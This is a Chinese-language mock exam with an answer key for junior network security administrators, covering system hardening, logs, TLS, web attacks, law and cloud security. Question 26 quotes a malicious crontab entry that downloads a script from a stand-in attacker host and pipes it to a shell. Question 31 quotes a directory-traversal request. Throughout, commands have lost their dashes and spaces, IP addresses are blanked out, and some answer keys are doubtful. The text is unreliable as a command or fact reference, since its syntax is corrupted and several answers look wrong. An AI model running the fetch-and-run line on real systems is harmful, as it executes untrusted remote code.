網(wǎng)絡安全管理員初級工模擬考試題與答案一、單項選擇題（每題1分，共40分。每題只有一個正確答案，請將正確選項填入括號內(nèi)）1.在WindowsServer2019中，若需強制所有域用戶下次登錄時必須修改密碼，應在“ActiveDirectory用戶和計算機”中勾選哪一項屬性？（）A.用戶不能更改密碼B.密碼永不過期C.用戶下次登錄時須更改密碼D.賬戶已禁用答案：C2.某企業(yè)防火墻采用狀態(tài)檢測機制，當內(nèi)網(wǎng)主機首次訪問外網(wǎng)Web服務器時，防火墻最先檢查的數(shù)據(jù)單元是（）A.應用層HTTP頭B.傳輸層TCP三次握手標志位C.網(wǎng)絡層IP分片偏移量D.數(shù)據(jù)鏈路層MAC地址答案：B3.下列哪條Linux命令可實時查看當前系統(tǒng)所有活躍網(wǎng)絡連接及其對應的進程PID？（）A.sstunpB.netstatrC.lsofiD.tcpdumpnn答案：A4.在SSL/TLS握手階段，服務器發(fā)送的Certificate消息中不包含以下哪項內(nèi)容？（）A.服務器公鑰B.證書頒發(fā)者名稱C.私鑰簽名值D.證書有效期答案：C5.依據(jù)《網(wǎng)絡安全法》，關鍵信息基礎設施運營者采購網(wǎng)絡產(chǎn)品或服務時，應當履行的安全義務是（）A.向工信部備案B.通過國家網(wǎng)絡安全審查C.取得ISO27001認證D.簽署源代碼托管協(xié)議答案：B6.某員工收到一封偽裝成HR的釣魚郵件，點擊鏈接后瀏覽器地址欄出現(xiàn)“”，攻擊者利用了哪種技術？（）A.DNS劫持B.同形異義字PunycodeC.IP碎片攻擊D.ARP欺騙答案：B7.在Windows日志中，事件ID4625表示（）A.賬戶成功登錄B.賬戶登錄失敗C.特權對象被訪問D.系統(tǒng)時間被更改答案：B8.下列關于WAF（Web應用防火墻）的說法，錯誤的是（）A.可基于正則規(guī)則攔截SQL注入B.可解密HTTPS流量進行檢測C.可完全替代Web服務器補丁更新D.可部署在反向代理模式答案：C9.使用nmap掃描目標主機“00”的Top1000端口，命令為（）A.nmapsSF00B.nmapsTp00C.nmapsUtopports100000D.nmapsS00答案：D10.在Linux系統(tǒng)中，若需禁止普通用戶通過Ctrl+Alt+Del重啟服務器，應修改哪一文件？（）A./etc/inittabB./etc/systemd/system/ctrlaltdel.targetC./etc/securettyD./etc/issue答案：B11.以下哪項不屬于對稱加密算法？（）A.SM4B.AES256GCMC.ECCD.3DES答案：C12.某云服務器開啟安全組，默認拒絕所有入站流量，若需允許僅來自“/24”的SSH訪問，應添加的規(guī)則是（）A.方向：入站，協(xié)議：TCP，端口：22，源：/0B.方向：入站，協(xié)議：TCP，端口：22，源：/24C.方向：出站，協(xié)議：TCP，端口：22，源：/24D.方向：入站，協(xié)議：UDP，端口：22，源：/24答案：B13.在Apache配置中，若要禁止解析/var/www/uploads目錄下的PHP文件，應添加（）A.RemoveHandler.phpB.php_flagengineoffC.DenyfromallD.OptionsExecCGI答案：B14.某攻擊者通過偽造源IP向目標發(fā)送大量SYN包，耗盡半開連接表，這種攻擊稱為（）A.SYNFloodB.UDPFloodC.SmurfD.TearDrop答案：A15.在Windows中，使用哪條命令可查看當前登錄用戶的訪問令牌？（）A.whoami/allB.netuserC.gpresult/hD.tasklist/v答案：A16.下列哪項不是社會工程學攻擊的常見手段？（）A.假冒客服電話索要驗證碼B.在會議室丟棄帶有惡意U盤C.利用零日漏洞遠程執(zhí)行代碼D.偽造緊急郵件誘導轉賬答案：C17.在MySQL8.0中，若需啟用“mysql_native_password”插件兼容舊客戶端，應執(zhí)行（）A.INSTALLPLUGINmysql_native_passwordSONAME'mysql_native_password.so';B.CREATEUSER'user'@'%'IDENTIFIEDWITHmysql_native_passwordBY'pwd';C.SETGLOBALpluginloadadd=mysql_native_password;D.ALTERUSER'user'@'%'REQUIRESSL;答案：B18.某企業(yè)采用802.1X對辦公網(wǎng)接入進行認證，認證協(xié)議選用EAPTLS，終端必須安裝（）A.用戶名密碼B.數(shù)字證書C.短信令牌D.硬件TOTP答案：B19.在Linux中，若需限制用戶“tom”的最大進程數(shù)為200，應在/etc/security/limits.conf中添加（）A.tomhardnproc200B.@tomsoftnproc200C.tommaxproc200D.hardnproc200答案：A20.下列關于IPv6安全特性的描述，正確的是（）A.鄰居發(fā)現(xiàn)協(xié)議（NDP）天然免疫欺騙攻擊B.IPSec為IPv6強制啟用，無需額外配置C.鏈路本地地址以fe80::/10開頭D.無狀態(tài)地址自動分配可杜絕地址掃描答案：C21.在WindowsDefender防火墻中，預定義規(guī)則“遠程桌面用戶模式（TCPIn）”默認端口為（）A.3389B.5985C.445D.135答案：A22.某網(wǎng)站使用JWT作為會話令牌，若簽名算法字段“alg”被改為“none”，可導致（）A.令牌立即失效B.令牌被強制刷新C.繞過簽名驗證D.觸發(fā)密鑰輪換答案：C23.在Linux中，若需查看文件/etc/shadow的最近訪問時間，應使用（）A.stat/etc/shadowB.lsl/etc/shadowC.file/etc/shadowD.md5sum/etc/shadow答案：A24.下列哪項不是OWASPTop102021新增風險？（）A.不安全的設計B.軟件與數(shù)據(jù)完整性故障C.跨站腳本D.服務器端請求偽造答案：C25.在CiscoIOS中，啟用SSH并禁用Telnet，應配置（）A.transportinputsshB.ipsshversion1C.linevty015loginlocalD.noiptelnet答案：A26.某管理員發(fā)現(xiàn)Crontab中被添加“curlhttp://evil.sh|sh”，其首要應急操作是（）A.重啟服務器B.立即刪除任務并檢查curl進程C.關閉80端口D.修改root密碼答案：B27.在Windows中，使用哪條命令可查看當前系統(tǒng)開放端口對應的PID？（）A.netstatanoB.ipconfig/allC.arpaD.routeprint答案：A28.下列關于云原生安全的描述，錯誤的是（）A.容器逃逸可能導致宿主機被控制B.Kubernetes默認啟用RBACC.鏡像倉庫應開啟簽名驗證D.Sidecar代理可增強微服務通信安全答案：B29.在Linux中，若需禁止ping，應設置內(nèi)核參數(shù)（）A.net.ipv4.icmp_echo_ignore_all=1B.net.ipv4.tcp_syncookies=1C.net.ipv4.ip_forward=0D.net.ipv4.conf.all.rp_filter=1答案：A30.某企業(yè)采用雙因子認證，以下組合中安全性最低的是（）A.指紋+短信B.密碼+硬件UKeyC.密碼+郵箱驗證碼D.人臉+動態(tài)令牌答案：C31.在Apache日志中，出現(xiàn)“../..\winnt\system32\cmd.exe”請求，最可能的攻擊是（）A.目錄遍歷B.SQL注入C.XSSD.CSRF答案：A32.在Windows中，若需查看當前系統(tǒng)所有本地用戶組，應使用（）A.netlocalgroupB.netgroupC.netuserD.netaccounts答案：A33.下列哪項不是數(shù)據(jù)備份的“321”原則內(nèi)容？（）A.至少3份副本B.使用2種不同介質C.其中1份離線D.每天3次增量備份答案：D34.在Linux中，若需對/var/log/audit/audit.log進行實時審計，應使用（）A.auditctlw/var/log/audit/audit.logpwaklog_changeB.ausearchf/var/log/audit/audit.logC.aureportfD.auditds答案：A35.某網(wǎng)站使用HSTS防御協(xié)議降級，其響應頭應為（）A.StrictTransportSecurity:maxage=31536000B.XFrameOptions:DENYC.ContentSecurityPolicy:defaultsrc'self'D.XXSSProtection:1答案：A36.在Windows中，若需查看當前系統(tǒng)所有計劃任務，應使用（）A.schtasks/query/foLIST/vB.tasklist/svcC.wmicjoblistD.at答案：A37.下列關于勒索病毒防御的說法，錯誤的是（）A.及時打補丁可減少攻擊面B.關閉宏可阻斷Office文檔傳播C.安裝殺毒軟件即可100%免疫D.網(wǎng)絡分段可限制橫向移動答案：C38.在Linux中，若需查看當前系統(tǒng)所有已加載的內(nèi)核模塊，應使用（）A.lsmodB.modprobelC.dmesgD.lsof答案：A39.某企業(yè)采用VPN遠程接入，若需記錄用戶撥入日志，應在WindowsRRAS中啟用（）A.事件查看器→遠程訪問B.網(wǎng)絡策略服務器→記賬C.本地安全策略→審核登錄事件D.系統(tǒng)日志→DNS答案：B40.在CiscoASA中，若需查看當前ACL命中計數(shù)，應使用（）A.showaccesslistB.showrunaccesslistC.showconnD.showinterface答案：A二、多項選擇題（每題2分，共20分。每題有兩個或兩個以上正確答案，多選、少選、錯選均不得分）41.以下哪些措施可有效降低暴力破解SSH密碼的風險？（）A.修改默認端口B.啟用Fail2banC.禁用密碼改用密鑰登錄D.關閉TCPWrapper答案：A、B、C42.關于Docker安全，以下說法正確的有（）A.容器共享宿主內(nèi)核B.使用非root用戶運行容器可降低風險C.開啟privileged選項可增強隔離D.鏡像掃描可檢測已知CVE答案：A、B、D43.以下哪些事件會觸發(fā)Windows安全日志ID4688？（）A.創(chuàng)建新進程B.刪除用戶賬戶C.啟用審核進程跟蹤D.進程命令行參數(shù)被記錄答案：A、C、D44.以下哪些屬于網(wǎng)絡層攻擊？（）A.ICMP重定向B.SYNFloodC.ARP欺騙D.Smurf攻擊答案：A、B、D45.以下哪些工具可用于內(nèi)存取證？（）A.VolatilityB.RekallC.WiresharkD.Memoryze答案：A、B、D46.以下哪些配置可增強ApacheSSL安全性？（）A.SSLProtocolallSSLv3TLSv1TLSv1.1B.SSLCipherSuiteHIGH:!aNULL:!MD5C.SSLHonorCipherOrderonD.SSLCertificateChainFile跳過中間證書答案：A、B、C47.以下哪些屬于個人信息保護法中的敏感個人信息？（）A.生物識別信息B.十四歲以下未成年人信息C.購物記錄D.醫(yī)療健康信息答案：A、B、D48.以下哪些命令可用于Linux系統(tǒng)完整性檢查？（）A.aidecheckB.rpmVaC.chkrootkitD.tripwirecheck答案：A、B、D49.以下哪些措施可防止CSRF攻擊？（）A.驗證Referer頭B.使用CSRFTokenC.設置SameSiteCookie屬性D.啟用CORS任意域名答案：A、B、C50.以下哪些端口常被用于遠程桌面協(xié)議？（）A.3389B.5900C.5985D.5938答案：A、C三、判斷題（每題1分，共10分。正確打“√”，錯誤打“×”）51.在Linux中，文件權限為“rwrr”表示所有者可寫，其他用戶可執(zhí)行。（）答案：×52.WindowsDefender防火墻出站規(guī)則默認允許所有流量。（）答案：√53.使用HTTPS的網(wǎng)站一定不存在釣魚風險。（）答案：×54.在Kubernetes中，PodSecurityPolicy已被廢棄，由PodSecurityStandards替代。（）答案：√55.將敏感數(shù)據(jù)寫入GitHub公開倉庫屬于供應鏈攻擊。（）答案：×56.在SQL注入中，使用參數(shù)化查詢可有效防御。（）答案：√57.關閉Windows的“遠程注冊表”服務可減少攻擊面。（）答案：√58.在Linux中，/etc/passwd文件存儲用戶密碼哈希。（）答案：×59.使用弱加密算法（如DES）比明文傳輸更安全。（）答案：×60.零信任架構默認信任內(nèi)網(wǎng)流量。（）答案：×四、填空題（每空1分，共20分）61.在Linux中，查看當前系統(tǒng)版本的命令是________。答案：unamea62.Windows事件日志文件默認存儲路徑為________。答案：C:\Windows\System32\winevt\Logs63.在SSL/TLS中，用于協(xié)商對稱密鑰的算法稱為________算法。答案：密鑰交換64.國家互聯(lián)網(wǎng)應急中心英文縮寫為________。答案：CNCERT65.在MySQL中，撤銷用戶權限的命令是________。答案：REVOKE66.在Apache中，用于隱藏版本號的指令是________。答案：ServerTokensProd67.在Linux中，禁止root遠程SSH登錄的配置項為________。答案：PermitRootLoginno68.在Windows中，查看當前登錄用戶的SID可使用命令________。答案：whoami/user69.在Kubernetes中，用于限制容器CPU使用的資源字段為________。答案：limits.cpu70.在Cisco交換機中，啟用端口安全的命令為________。答案：switchportportsecurity71.在Linux中，查看當前監(jiān)聽TCP80端口的進程命令為________。答案：sstunlp|grep:8072.在Windows中，本地安全策略管理控制臺命令為________。答案：secpol.msc73.在密碼學中，HMAC的作用是提供________和________。答案：完整性、認證74.在Docker中，查看鏡像歷史層的命令為________。答案：dockerhistory75.在Linux中，設置文件不可變屬性的命令為________。答案：chattr+i76.在Windows中，查看當前ARP緩存表的命令為________。答案：arpa77.在SSL/TLS中，OCSP的作用是________。答案：在線證書狀態(tài)查詢78.在Linux中，查看系統(tǒng)啟動時間的命令為________。答案：uptimes79.在Apache中，配置日志格式的指令為________。答案：LogFormat80.在Windows中，查看當前用戶所屬組的命令為________。答案：netuser%username%